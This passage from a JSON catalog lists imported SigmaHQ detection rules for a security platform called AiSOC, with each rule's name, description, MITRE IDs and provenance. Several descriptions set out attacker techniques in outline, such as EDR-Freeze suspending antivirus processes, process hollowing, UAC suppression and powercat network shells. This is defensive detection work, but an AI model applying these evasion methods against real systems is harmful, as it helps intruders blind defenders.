"path": "detections/sigma-imports/_quarantine/enable-lm-hash-storage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c420410f-c2d8-4010-856b-dffe21866437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml" } }, { "id": "sigmahq-sigma-c42a3073-30fb-48ae-8c99-c23ada84b103", "type": "detection", "name": "Hack Tool User Agent", "description": "Detects suspicious user agent strings user by hack tools in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hack-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c42a3073-30fb-48ae-8c99-c23ada84b103", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_hacktool.yml" } }, { "id": "sigmahq-sigma-c43a5405-e8e1-4221-9ac9-dbe3fa14e886", "type": "detection", "name": "System Language Discovery via Reg.Exe", "description": "Detects the usage of Reg.Exe to query system language settings.\nAttackers may discover the system language to determine the geographic location of victims, customize payloads for specific regions,\nor avoid targeting certain locales to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1614.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-language-discovery-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c43a5405-e8e1-4221-9ac9-dbe3fa14e886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_system_language_discovery.yml" } }, { "id": "sigmahq-sigma-c43c26be-2e87-46c7-8661-284588c5a53e", "type": "detection", "name": "A Member Was Added to a Security-Enabled Global Group", "description": "Detects activity when a member is added to a security-enabled global group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-member-was-added-to-a-security-enabled-global-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c43c26be-2e87-46c7-8661-284588c5a53e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" } }, { "id": "sigmahq-sigma-c443012c-7928-43bf-ac20-7eda5efe61ad", "type": "detection", "name": "Suspicious Uninstall of Windows Defender Feature via PowerShell", "description": "Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-uninstall-of-windows-defender-feature-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c443012c-7928-43bf-ac20-7eda5efe61ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_uninstall_defender_feature.yml" } }, { "id": "sigmahq-sigma-c453ab7a-1f5c-4716-a3b4-dea8135fb43a", "type": "detection", "name": "Registry Manipulation via WMI Stdregprov", "description": "Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.\nThis behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.\nAttackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1112", "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-manipulation-via-wmi-stdregprov.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c453ab7a-1f5c-4716-a3b4-dea8135fb43a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_stdregprov_reg_modification.yml" } }, { "id": "sigmahq-sigma-c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "type": "detection", "name": "Communication To LocaltoNet Tunneling Service Initiated - Linux", "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-localtonet-tunneling-service-initiated-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml" } }, { "id": "sigmahq-sigma-c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "type": "detection", "name": "Suspicious PsExec Execution", "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_psexec.yml" } }, { "id": "sigmahq-sigma-c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "type": "detection", "name": "HackTool - SharpUp PrivEsc Tool Execution", "description": "Detects the use of SharpUp, a tool for local privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1569.002", "T1574.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpup-privesc-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml" } }, { "id": "sigmahq-sigma-c49c5062-0966-4170-9efd-9968c913a6cf", "type": "detection", "name": "Stop Windows Service Via PowerShell Stop-Service", "description": "Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-powershell-stop-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c49c5062-0966-4170-9efd-9968c913a6cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml" } }, { "id": "sigmahq-sigma-c4b890e5-8d8c-4496-8c66-c805753817cd", "type": "detection", "name": "Potential Process Hollowing Activity", "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-hollowing-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml" } }, { "id": "sigmahq-sigma-c4e06896-e27c-4583-95ac-91ce2279345d", "type": "detection", "name": "Potential XXE Exploitation Attempt In JVM Based Application", "description": "Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xxe-exploitation-attempt-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e06896-e27c-4583-95ac-91ce2279345d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_xxe_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-c4e49831-1496-40cf-8ce1-b53f942b02f9", "type": "detection", "name": "Renamed PAExec Execution", "description": "Detects execution of renamed version of PAExec. Often used by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-paexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" } }, { "id": "sigmahq-sigma-c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "type": "detection", "name": "Service Installed By Unusual Client - Security", "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installed-by-unusual-client-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" } }, { "id": "sigmahq-sigma-c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "type": "detection", "name": "Scheduled Task Executing Encoded Payload from Registry", "description": "Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executing-encoded-payload-from-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml" } }, { "id": "sigmahq-sigma-c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "type": "detection", "name": "ProcessHacker Privilege Elevation", "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/processhacker-privilege-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml" } }, { "id": "sigmahq-sigma-c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "type": "detection", "name": "Binary Padding - Linux", "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-padding-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_binary_padding.yml" } }, { "id": "sigmahq-sigma-c539afac-c12a-46ed-b1bd-5a5567c9f045", "type": "detection", "name": "Potential Remote PowerShell Session Initiated", "description": "Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\nThis could potentially indicates a remote PowerShell connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-powershell-session-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-c57872c7-614f-4d7f-a40d-b78c8df2d30d", "type": "detection", "name": "Assembly Loading Via CL_LoadAssembly.ps1", "description": "Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. This can be abused to load different assemblies and bypass App locker controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/assembly-loading-via-cl-loadassembly-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" } }, { "id": "sigmahq-sigma-c598cc0c-9e70-4852-b9eb-8921af79f598", "type": "detection", "name": "Hacktool - EDR-Freeze Execution", "description": "Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows.\nEDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process.\nThis technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-edr-freeze-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c598cc0c-9e70-4852-b9eb-8921af79f598", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_edr_freeze.yml" } }, { "id": "sigmahq-sigma-c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "type": "detection", "name": "Replace Desktop Wallpaper by Powershell", "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replace-desktop-wallpaper-by-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" } }, { "id": "sigmahq-sigma-c5b20776-639a-49bf-94c7-84f912b91c15", "type": "detection", "name": "Netcat The Powershell Version", "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netcat-the-powershell-version.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5b20776-639a-49bf-94c7-84f912b91c15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" } }, { "id": "sigmahq-sigma-c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "type": "detection", "name": "Suspicious Schtasks Execution AppData Folder", "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-execution-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" } }, { "id": "sigmahq-sigma-c5cd1b20-36bb-488d-8c05-486be3d0cb97", "type": "detection", "name": "Privileged Container Deployed", "description": "Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor mounting a container breakout attacks.\nA privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\nVarious versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-container-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5cd1b20-36bb-488d-8c05-486be3d0cb97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml" } }, { "id": "sigmahq-sigma-c5f6a85d-b647-40f7-bbad-c10b66bab038", "type": "detection", "name": "UAC Notification Disabled", "description": "Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\nUAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\nWhen \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-notification-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5f6a85d-b647-40f7-bbad-c10b66bab038", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml" } }, { "id": "sigmahq-sigma-c615d676-f655-46b9-b913-78729021e5d7", "type": "detection", "name": "Data Export From MSSQL Table Via BCP.EXE", "description": "Detects the execution of the BCP utility in order to export data from the database.\nAttackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-export-from-mssql-table-via-bcp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c615d676-f655-46b9-b913-78729021e5d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bcp_export_data.yml" } }, { "id": "sigmahq-sigma-c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "type": "detection", "name": "Uncommon File Creation By Mysql Daemon Process", "description": "Detects the creation of files with scripting or executable extensions by Mysql daemon.\nWhich could be an indicator of \"User Defined Functions\" abuse to download malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-creation-by-mysql-daemon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml" } }, { "id": "sigmahq-sigma-c625d754-6a3d-4f65-9c9a-536aea960d37", "type": "detection", "name": "Permission Check Via Accesschk.EXE", "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/permission-check-via-accesschk-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c625d754-6a3d-4f65-9c9a-536aea960d37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" } }, { "id": "sigmahq-sigma-c633622e-cab9-4eaa-bb13-66a1d68b3e47", "type": "detection", "name": "New Virtual Smart Card Created Via TpmVscMgr.EXE", "description": "Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-virtual-smart-card-created-via-tpmvscmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c633622e-cab9-4eaa-bb13-66a1d68b3e47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml" } }, { "id": "sigmahq-sigma-c6438007-e081-42ce-9483-b067fbef33c3", "type": "detection", "name": "Powershell Timestomp", "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-timestomp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6438007-e081-42ce-9483-b067fbef33c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" } }, { 